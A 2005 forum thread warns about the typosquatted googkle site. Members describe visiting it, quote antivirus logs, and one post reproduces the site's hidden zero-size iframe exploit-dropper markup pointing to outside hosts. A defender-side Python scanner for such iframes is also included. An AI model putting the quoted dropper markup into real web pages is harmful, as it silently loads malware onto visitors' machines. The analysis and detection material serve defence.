Be careful typing google


melthebell
27-04-2005, 21:06
check out this site, if you misspell google while typing the url you may get this well dodgy looking site that instantly installs at least 5 trojans and various bits of spyware.
http://www.f-secure.com/v-descs/googkle.shtml

msbehavin
27-04-2005, 21:14
presumably then we aren't supposed to click on the link to the 'dodgy looking site'....??:confused:

Abdul
27-04-2005, 21:16
The link is quite safe...it directs you to a page of information regarding the dodgy site, not the dodgy site itself.

redrobbo
27-04-2005, 21:17
Er ....check it out? Think not.

msbehavin
27-04-2005, 21:18
it's safe Robbo dearest - I checked after reading Abdul's post (trusting ain't I???)

Craigy
27-04-2005, 23:17
oooh I'm well known at college for my typing mistakes and I think I would take the cake if I opened that 1 on their already dodgy network :hihi:

21steve
28-04-2005, 06:52
anyone else tempted to go to googkle?

Craigy
28-04-2005, 08:50
hahaha yea I'm tempted... I think I'll go back to the press the red button thread to try and ease my curiosity.

Cyclone
28-04-2005, 08:55
interesting.

I've added it to my restricted sites list (under tools, options, security) just in case I ever mistype google.

A pop-up blocker should actually render the site safe as the explanation says that the process starts with 2 pop up windows being opened which download the first exploits.

Sidla
28-04-2005, 10:12
Well, all tanked up with ad-aware, spyware s&d, a fully up-to-date AVG, McAfee Personal Firewall, and stupidity, I just visited googkle.com, and expecting to see loads of windows telling me that so-and-so trojan has been blocked, I actually see nothing.

Maybe the threat has gone now? :suspect:

Originally posted by Cyclone
A pop-up blocker should actually render the site safe as the explanation says that the process starts with 2 pop up windows being opened which download the first exploits.
Actually, that would explain it, I ought to read things first. Good ol' Firefox! ;)

sccsux
28-04-2005, 10:22
Originally posted by 21steve
anyone else tempted to go to googkle?



I've just been and visited it;).


No infections here....(Thank you Firefox);).


FTR. The site is based on the CoolWebSearch database, and uses an iframe to drop the exploits:


exploit dropper:


<IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src="http://www.ntsearch.com/popengine/popup3.htm" width=0></iframe>
<iframe src="http://toolbarpartner.com/in.php?wm=Zergio" width="0" height="0"></iframe>


The URL in bold is the exploit dropper page which contains more iframes:


<IFRAME SRC="http://toolbarpartner.com/adverts/Zergio/index3.html" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC="http://toolbarpartner.com/adverts/Zergio/index2.html" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC="http://toolbarpartner.com/adverts/Zergio/indexchm.html" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<IFRAME SRC="http://toolbarpartner.com/cookies2.php" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>


Can't be bothered to go any deeper @ the moment, maybe later;).



If anyone wants to go, make sure you have decent protection;)...
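
A defender-side check for the zero-size iframe pattern quoted in the post above, as an added example that is not part of the original thread: a Python standard-library scan that flags iframes rendered with zero dimensions or hidden by inline style. The sample markup, its placeholder hosts and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: zero-size / display:none attributes mirror the tags quoted
# in the post, hosts are placeholders; the last iframe is a normal visible embed.
SAMPLE = """
<IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src="http://ads.example/popup3.htm" width=0></iframe>
<iframe src="http://partner.example/in.php?wm=x" width="0" height="0"></iframe>
<IFRAME SRC="http://partner.example/cookies.php" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
"""

ZERO = re.compile(r"0+(\.0+)?(px|%|em)?")
def is_zero(value):
    # True for "0", "0px", "0%"; False when the attribute is absent or empty.
    return value is not None and ZERO.fullmatch(value.strip().lower()) is not None

def hiding_reasons(attrs):
    """List the ways an iframe's attributes make it invisible to the user."""
    reasons = [f"{k}=0" for k in ("width", "height") if is_zero(attrs.get(k))]
    for decl in (attrs.get("style") or "").split(";"):
        prop, _, val = (s.strip().lower() for s in decl.partition(":"))
        if (prop, val) in (("display", "none"), ("visibility", "hidden")):
            reasons.append(f"style {prop}:{val}")
        elif prop in ("width", "height") and is_zero(val):
            reasons.append(f"style {prop}:0")
    return reasons

class IframeAudit(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.findings = page_host, []

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = hiding_reasons(a)
        if reasons:
            host = urlparse(a.get("src") or "").hostname
            self.findings.append({"src": a.get("src"), "reasons": reasons,
                                  "third_party": host not in (None, self.page_host)})

def find_hidden_iframes(html, page_host):
    audit = IframeAudit(page_host)
    audit.feed(html)
    audit.close()
    return audit.findings
```

Calling `find_hidden_iframes(SAMPLE, "typo.example")` returns one finding per invisible iframe, each with its `src`, the reasons it is hidden and whether it loads from a host other than the page's own.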

spiffymonkey
28-04-2005, 10:58
Originally posted by Sidla
Well, all tanked up with ad-aware, spyware s&d, a fully up-to-date AVG, McAfee Personal Firewall, and stupidity, I just visited googkle.com,

I'm going to go visit from my Linux box. Should be quite safe ;)

sccsux
28-04-2005, 11:04
Originally posted by spiffymonkey
I'm going to go visit from my Linux box. Should be quite safe ;)


Coward;).


I went with ye olde Win 98:o


Then went deeper & still got nothing....



I wouldn't advocate visiting using IE though;)..

Avalon
28-04-2005, 12:15
Just been on from work PC! Good old Norton!

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: MHTMLRedir.Exploit
File: C:\Documents and Settings\jonathan.price\Local Settings\Temporary Internet Files\Content.IE5\720VFH05\popup3[1].htm
Location: Quarantine
Computer: NHSDEVWS248
User: jonathan.price
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Thu Apr 28 14:11:02 2005

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Downloader.Trojan
File: C:\Documents and Settings\jonathan.price\Local Settings\Temporary Internet Files\Content.IE5\0DUZK16V\frame[1].exe
Location: Quarantine
Computer: NHSDEVWS248
User: jonathan.price
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Thu Apr 28 14:11:21 2005

etc etc etc....

Craigy
29-04-2005, 10:23
hehe I knew I couldn't resist it... college network detected it and stopped it no problem :o it did better than I expected

21steve
29-04-2005, 10:35
ok so I wasn't the only one tempted.

firefox did make it a rather boring affair tho!

LesMcQueen
29-04-2005, 11:13
You guys with Nav. Don't get complacent. ;-)
This site does a lot more than attempt to infect you with MHTMLRedir.Exploit and Downloader.trojan.

I accessed the site using the latest Nav/Sav defs., got the same NAV events as yourselves, and yet still managed to pick up the following....

Bloodhound Exploit ActiveX Trojan Adware
CoolWebSearch.ntsearch Browser Modifier
IST.SlotchBar Toolbar
RealVNC Remote Control Software

melthebell
01-05-2005, 12:15
Originally posted by redrobbo
Er ....check it out? Think not.

LOL F-Secure is an anti virus / security site that lets us know the new nasties on the block :)